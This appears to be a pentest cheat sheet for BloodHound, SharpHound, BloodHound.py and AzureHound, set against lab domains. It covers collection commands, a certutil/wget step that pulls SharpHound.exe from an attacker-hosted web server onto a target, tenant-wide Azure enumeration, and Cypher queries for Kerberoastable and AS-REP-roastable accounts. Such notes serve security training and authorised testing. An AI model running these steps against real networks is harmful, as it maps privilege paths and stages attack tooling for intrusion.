Skip to content

BloodHound

BloodHound


  • install and run neo4j
  • start bloodhound gui
    sudo apt install -y bloodhound
    bloodhound --no-sandbox
    
wget https://github.com/BloodHoundAD/BloodHound/releases/download/v4.3.0/BloodHound-linux-x64.zip

SharpHound.ps1

  • source: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
    wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1 -O /opt/windows/SharpHound.ps1
    
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain INLANEFREIGHT.LOCAL -ZipFileName azdump.zip
# wait, be patient

SharpHound


install

wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip  -O /opt/windows/SharpHound.zip
unzip /opt/windows/SharpHound.zip -d /opt/windows/sharpHound
rm /opt/windows/SharpHound.zip
expose
mkdir -p /home/kali/workspace/www & cd /home/kali/workspace/www
cp /opt/windows/sharpHound/SharpHound.exe .
python3 -m http.server 80
delivery
certutil -urlcache -f http://192.168.45.226/SharpHound.exe SharpHound.exe
wget http://192.168.45.226/SharpHound.exe -O SharpHound.exe
run
.\SharpHound.exe --CollectionMethods All --Domain oscp.exam --ExcludeDCs
# wait, be patient

BloodHound.py


BloodHound.py is a Python based ingestor for BloodHound, based on Impacket.

echo "==========> Windows:bloodHoundPy"
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip
unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/
mv BloodHound.py-1.0.1 bloodHoundPy
rm /opt/windows/bloodHoundPy.zip
/opt/windows/bloodHoundPy/bloodhound.py -u 'admin' -p 'xxxxxxxxxx' -ns '172.16.5.5' -d 'e-corp.com' -c all

AzureHound


install

echo "==========> Windows:AzureHound"
wget https://github.com/BloodHoundAD/AzureHound/releases/download/v1.2.4/azurehound-linux-amd64.zip -O /opt/windows/Azurehound.zip
unzip /opt/windows/Azurehound.zip -d /opt/windows
rm /opt/windows/Azurehound.zip
dump all
/opt/windows/azurehound -u "admin@e-corp.com" -p "xxxxxxxxxx" list --tenant "e-corp.com" -o all.json
dump one object type per call
export USER='admin@e-corp.com'
export PASS='xxxxxxxxxxxxxxxx'
export TENA='e-corp.com'
|-<
echo $USER
echo $PASS
echo $TENA
|-<
/opt/windows/azurehound --help
/opt/windows/azurehound list --help

/opt/windows/azurehound -u $USER -p $PASS list tenants --tenant $TENA -o tenants.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list users --tenant $TENA -o users.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list groups --tenant $TENA -o groups.json -v 1

/opt/windows/azurehound -u $USER -p $PASS list group-owners --tenant $TENA -o group-owners.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list group-members --tenant $TENA -o group-members.json -v 1

/opt/windows/azurehound -u $USER -p $PASS list management-group-descendants --tenant $TENA -o management-group-descendants.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-owners --tenant $TENA -o management-group-owners.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-role-assignments --tenant $TENA -o management-group-role-assignments.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-group-user-access-admins --tenant $TENA -o management-group-user-access-admins.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list management-groups --tenant $TENA -o management-groups.json

/opt/windows/azurehound -u $USER -p $PASS list roles --tenant $TENA -o roles.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list role-assignments --tenant $TENA -o role-assignments.json -v 1

/opt/windows/azurehound -u $USER -p $PASS list devices --tenant $TENA -o devices.json -v 1
/opt/windows/azurehound -u $USER -p $PASS list device-owners --tenant $TENA -o device-owners.json -v 1

Analytics Queries


List all Kerberoastable Accounts

MATCH (n:User) WHERE n.hasspn=true RETURN n

Find user that doesn’t require kerberos pre-authentication (aka AS-REP Roasting)

MATCH (u:User {dontreqpreauth: true}) RETURN u

Find servers a user can RDP into.

match p=(g:Group)-[:CanRDP]->(c:Computer) where  g.objectid ENDS WITH '-513'  AND c.operatingsystem CONTAINS 'Server' return p

Find all sessions any user in a specific domain has

MATCH p=(m:Computer)-[r:HasSession]->(n:User {domain: "ZA.TRYHACKME.COM"}) RETURN p

View all groups that contain the word ‘admin’

Match (n:Group) WHERE n.name CONTAINS "ADMIN" return n

View all users that contain the word ‘admin’

Match (n:User) WHERE n.name CONTAINS "ADMIN" return n

View all computers

MATCH (p:Computer) RETURN p;